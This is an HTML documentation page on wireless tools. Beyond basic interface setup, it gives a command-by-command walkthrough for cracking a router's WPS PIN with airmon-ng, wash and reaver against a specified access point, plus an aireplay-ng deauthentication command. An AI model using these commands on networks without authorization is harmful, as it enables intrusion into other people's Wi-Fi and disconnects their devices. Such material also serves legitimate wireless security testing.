<html dir="ltr" lang="en">
<head>
<meta charset='utf-8'>
<title>Wireless</title>
</head>
<body>
<a href="index.html">Tools Index</a>
<h1>Wireless</h1>
<h2>Manual configuration</h2>
<pre>
# iwlist wlp2s0 scan
# iwconfig wlp2s0 essid name_of_network
</pre>
<p>To get the MAC address of the target cell:</p>
<pre>
# iwlist wlp2s0 scan
</pre>
<p>The part of the example output that matters:</p>
<pre>
Cell 03 - Address: A8:A6:68:98:0C:C5
</pre>
<h4>Recover WPS Password</h4>
<p>First check for processes that interfere with the state of the interface and kill them:</p>
<pre>
# airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1271 wpa_supplicant
1576 wpa_supplicant
1633 dhclient
Process with PID 1576 (wpa_supplicant) is running on interface wlan0
Process with PID 1633 (dhclient) is running on interface wlan0
</pre>
<p>Use pkill or kill on all of them, e.g. PID 1271:</p>
<pre>
# kill -15 1271
</pre>
<p>If that fails:</p>
<pre>
# kill -9 1271
</pre>
<p>If the wireless card is Intel, reload its driver modules:</p>
<pre>
# rmmod iwlmvm
# rmmod iwlwifi
# modprobe iwlwifi
</pre>
<p>Put the interface in monitor mode:</p>
<pre>
# iwconfig wlp2s0 mode monitor
# ifconfig wlp2s0 up
</pre>
<pre>
# airmon-ng start wlp2s0
Interface Chipset Driver
wlp2s0 Intel AC iwlwifi - [phy1]
(monitor mode enabled on mon0)
</pre>
<p>Airodump-ng does not report whether a router has WPS or not; wash is used for that:</p>
<pre>
# wash -i wlp2s0
</pre>
<p>If the program reports "Found packet with bad FCS", run it with -C:</p>
<pre>
# wash -C -i wlp2s0
</pre>
<p>Put mon0 on the same channel as the target cell:</p>
<pre>
# iwconfig mon0 channel 6
</pre>
<p>Start the magic:</p>
<pre>
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
</pre>
<p>If the ESSID is cloaked (not being broadcast), provide it to reaver with -e:</p>
<pre>
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "essid_name" -vv
</pre>
<p>To deauthenticate a client (-a is the address of the access point, -c is the client to deauthenticate):</p>
<pre>
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
</pre>
<a href="index.html">Tools Index</a>
<p>This is part of the Tribu System Documentation.
Copyright (C) 2020
Tribu Team.
See the file <a href="../fdl-1.3-standalone.html">GNU Free Documentation License</a>
for copying conditions.</p>
</body>
</html>